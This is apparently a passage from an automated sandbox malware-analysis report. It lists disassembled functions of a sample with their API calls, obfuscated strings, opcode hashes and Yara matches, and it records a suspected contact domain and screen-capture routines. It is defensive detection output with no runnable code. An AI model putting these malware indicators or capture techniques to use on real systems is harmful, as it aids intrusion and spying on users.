                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                                                                                                                                                                                        • API String ID: 0-2419925205
                                                                                                                                                                                                                                        • Opcode ID: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
                                                                                                                                                                                                                                        • Instruction ID: 9f1d6bf66a6c09cf1082a959082ca12ed41cffceed8143a23b56c0da185a1bc3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01422CB0905369CFDB64CF56D981BCDBBB1FB05300F1185E8C1996B262DB748A8ACF85
                                                                                                                                                                                                                                        Function 02119AA7 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: ~|$SP$if$pv$tj$vt
                                                                                                                                                                                                                                        • API String ID: 3664257935-1422159894
                                                                                                                                                                                                                                        • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                        • Instruction ID: 2dbf38afd0e26cd04cec60a13fc59b6ff3bba0d02946652a9ffe47c4a222c623
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B621870689350AFE724CB24CC91B2FBBE2EFC5318F18863CE5A597290D771A845CB56
                                                                                                                                                                                                                                        Function 00417405 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1110COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 5&'d$O$~
                                                                                                                                                                                                                                        • API String ID: 0-1622812124
                                                                                                                                                                                                                                        • Opcode ID: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
                                                                                                                                                                                                                                        • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                                                                                                                                                        Function 0210D7AC Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetDC.USER32(00000000), ref: 02136BF0
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02136C11
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02136C21
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: DeleteObject.GDI32(00000000), ref: 02136C28
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: CreateCompatibleDC.GDI32(00000000), ref: 02136C37
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02136C42
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: SelectObject.GDI32(00000000,00000000), ref: 02136C4E
                                                                                                                                                                                                                                          • Part of subcall function 02136BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02136C71
                                                                                                                                                                                                                                        • CoUninitialize.COMBASE ref: 0210D7BC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                        • String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
                                                                                                                                                                                                                                        • API String ID: 3248263802-1016125510
                                                                                                                                                                                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                        • Instruction ID: 4cfc84a57298ed6a1839eec60b75e785d66f1f3555f4304262f6bce4d7d6355a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01B125756447818BE725CF6AC4E0762FBE2FF96304B18C1ACC4D64BB8AC778A406CB51
                                                                                                                                                                                                                                        Function 0040D545 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                          • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                          • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                          • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                          • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                          • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                          • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 0040D555
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                        • String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
                                                                                                                                                                                                                                        • API String ID: 3213364925-1016125510
                                                                                                                                                                                                                                        • Opcode ID: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                                                                                                                                                        • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                                                                                                                                                        Function 0211C667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                        • API String ID: 0-102253164
                                                                                                                                                                                                                                        • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                        • Instruction ID: eedd14aac00b105a06c04efae682c1a3f08f436448e8aa41e2d1099322fcc536
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 503238B19802118BCB24CF24C8927B7B7B2FF95314F2992ADD8415F794E7759802CBD2
                                                                                                                                                                                                                                        Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                        • API String ID: 0-102253164
                                                                                                                                                                                                                                        • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                        • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                                        Function 02108AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02108B0B
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02108B15
                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02108BBC
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 02108BD1
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02108D1E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                        • String ID: 6W01
                                                                                                                                                                                                                                        • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                        • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                        • Instruction ID: b8119d4ac36c96a109aa36d594b407411a6e85609a36fe25d28a0508d7e5caff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D518E73A843040FD728AF659C85356BAD79FC1314F1FC1399955AB3E5EAB488068BC1
                                                                                                                                                                                                                                        Function 02120FF7 Relevance: 10.5, Strings: 8, Instructions: 470COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
                                                                                                                                                                                                                                        • API String ID: 0-2668584225
                                                                                                                                                                                                                                        • Opcode ID: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
                                                                                                                                                                                                                                        • Instruction ID: 5ce4836277cd256feeb600769cb6d52dfc40e56bed850f7285b8a5f083ca366d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E1F1715483508BC728DF64C89276BB7F2EFD6324F198A1CE4D98B391E3349909CB92
                                                                                                                                                                                                                                        Function 00420D90 Relevance: 10.5, Strings: 8, Instructions: 470COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
                                                                                                                                                                                                                                        • API String ID: 0-2668584225
                                                                                                                                                                                                                                        • Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
                                                                                                                                                                                                                                        • Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96
                                                                                                                                                                                                                                        Function 00427860 Relevance: 10.4, Strings: 8, Instructions: 409COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: J+$JW$]_$bX_^$r}B$+5$/)$3=
                                                                                                                                                                                                                                        • API String ID: 0-2499027453
                                                                                                                                                                                                                                        • Opcode ID: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
                                                                                                                                                                                                                                        • Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A
                                                                                                                                                                                                                                        Function 004186FC Relevance: 8.5, Strings: 6, Instructions: 1000COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: +$<$H)G+$NmNo$]a_c$tu
                                                                                                                                                                                                                                        • API String ID: 0-4096164410
                                                                                                                                                                                                                                        • Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
                                                                                                                                                                                                                                        • Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A
                                                                                                                                                                                                                                        Function 0210B097 Relevance: 7.8, Strings: 6, Instructions: 344COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8)*6$8)*6$:33F$Ds$]f$}v
                                                                                                                                                                                                                                        • API String ID: 0-771823803
                                                                                                                                                                                                                                        • Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
                                                                                                                                                                                                                                        • Instruction ID: d7e13919bf02b0b5e62e60ba9b02a334ae1d5bcdddd419ba180c300b3996b2f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB12B7524C3508BD324CF6884906AFFBE1AFD2218F58892CE4D59B391D7B5CB0ACB56
                                                                                                                                                                                                                                        Function 0040AE30 Relevance: 7.8, Strings: 6, Instructions: 344COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8)*6$8)*6$:33F$Ds$]f$}v
                                                                                                                                                                                                                                        • API String ID: 0-771823803
                                                                                                                                                                                                                                        • Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
                                                                                                                                                                                                                                        • Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E
                                                                                                                                                                                                                                        Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                                                                                                                                                        • API String ID: 0-3030200349
                                                                                                                                                                                                                                        • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                        • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                                                                                                                                                        Function 0213F3B7 Relevance: 6.8, Strings: 5, Instructions: 524COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: S"(w$S"(w$d5fg$d5fg$f
                                                                                                                                                                                                                                        • API String ID: 0-2961185688
                                                                                                                                                                                                                                        • Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
                                                                                                                                                                                                                                        • Instruction ID: 19e0acad13b62c9e768ca4f9a2d7bd3ed61b850dd26ee6dfd009e40c3259c750
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F12E775A493519FC325CF18C880B2EBBE2AFC5318F18866CF4A55B7A1D771D806CB92
                                                                                                                                                                                                                                        Function 0043F150 Relevance: 6.8, Strings: 5, Instructions: 524COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: S"(w$S"(w$d5fg$d5fg$f
                                                                                                                                                                                                                                        • API String ID: 2994545307-2961185688
                                                                                                                                                                                                                                        • Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
                                                                                                                                                                                                                                        • Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A
                                                                                                                                                                                                                                        Function 00428437 Relevance: 6.7, Strings: 5, Instructions: 469COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "#$H}}C$J'N!$LMR|$vu~r
                                                                                                                                                                                                                                        • API String ID: 0-1530353048
                                                                                                                                                                                                                                        • Opcode ID: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
                                                                                                                                                                                                                                        • Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A
                                                                                                                                                                                                                                        Function 02104517 Relevance: 6.7, Strings: 5, Instructions: 464COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
